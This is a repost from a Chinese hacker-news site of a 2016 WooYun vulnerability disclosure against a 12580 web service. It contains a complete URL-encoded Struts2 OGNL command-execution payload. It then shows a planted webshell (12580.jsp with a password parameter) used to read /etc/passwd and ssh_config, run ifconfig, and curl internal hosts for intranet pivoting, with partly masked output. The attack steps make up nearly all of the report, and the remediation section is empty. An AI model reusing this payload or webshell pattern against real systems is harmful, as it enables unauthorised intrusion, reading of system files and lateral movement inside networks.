记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

12580某站命令执行已shell可内网渗透

2016-06-26 21:55

code 区域

mask 区域
1.http://**.**.**/GetHotelListAction!initc.do  str2命令执行漏洞_

**********

2.http://**.**.**/GetHotelListAction!initc.doredirect%3A%24%7B%23res%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23res.setCharacterEncoding%28%22UTF-8%22%29%2C%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%22echo%22%2C%22Test by 2%22%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%**.**.**.**.InputStreamReader%28%23b%29%2C%23d%3Dnew%**.**.**.**.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B9%5D%2C%23d.read%28%23e%29%2C%23res.getWriter%28%29.println%28%23e%29%2C%23res.getWriter%28%29.flush%28%29%2C%23res.getWriter%28%29.close%28%29%7D_

**********

**********

*****ll读取*****

**********

3.http://**.**.**/12580.jsppwd=0324&i=cat%20/etc/ssh/ssh_config_

**********

*****dd8b05eb8a75c124cb.png"*****

**********

**********

4.http://**.**.**/12580.jsppwd=0324&i=cat%20/etc/passwd_

**********

**********

*****:/root:/*****

*****bin:/sbi*****

*****:/sbin:/sb*****

*****r/adm:/sb*****

*****ool/lpd:/s*****

*****:/sbin:/*****

*****wn:/sbin:/s*****

*****:/sbin:/*****

*****/spool/mail*****

*****spool/uucp:/*****

*****tor:/root:/*****

*****/usr/games:*****

*****var/gopher:/*****

*****/var/ftp:/s*****

*****body:/:/s*****

*****sage bus:/:/*****

*****/var/cache/rpc*****

*****memory owner:/d*****

*****c/abrt:/sb*****

*****r":/var/empty/*****

*****pool/postfix*****

***** daemon:/:/*****

*****/ntp:/sbi*****

*****ck:/var/run/avahi-*****

***** User:/var/lib*****

***** NFS User:/var/li*****

*****d SSH:/var/empty*****

*****::/:/sbi*****

*****be used by OProfile:/*****

*****home/tomca*****

*****home/yz:*****

*****ome/www:/*****

*****/home/logu*****

**********

**********

5.http://**.**.**/12580.jsppwd=0324&i=ifconfig 执行ifconfig_

*****在*****

*****1ecbaff5cae4d0f469.png"*****

**********

**********

**********

6.http://**.**.**/12580.jsppwd=0324&i=curl%20**.**.**.** 404_

**********

7.http://**.**.**/12580.jsppwd=0324&i=curl%20**.**.**.** phpinfo_

*****37399ec3459f75ee7c.png"*****

**********

8.http://**.**.**/12580.jsppwd=0324&i=curl%20**.**.**.** tomcat_

**********

*****个站没*****

漏洞证明:

来个5wb,我要进社区

修复方案:

不定

知识来源: www.wooyun.org/bugs/wooyun-2016-0206745

阅读:102572 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“12580某站命令执行已shell可内网渗透”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云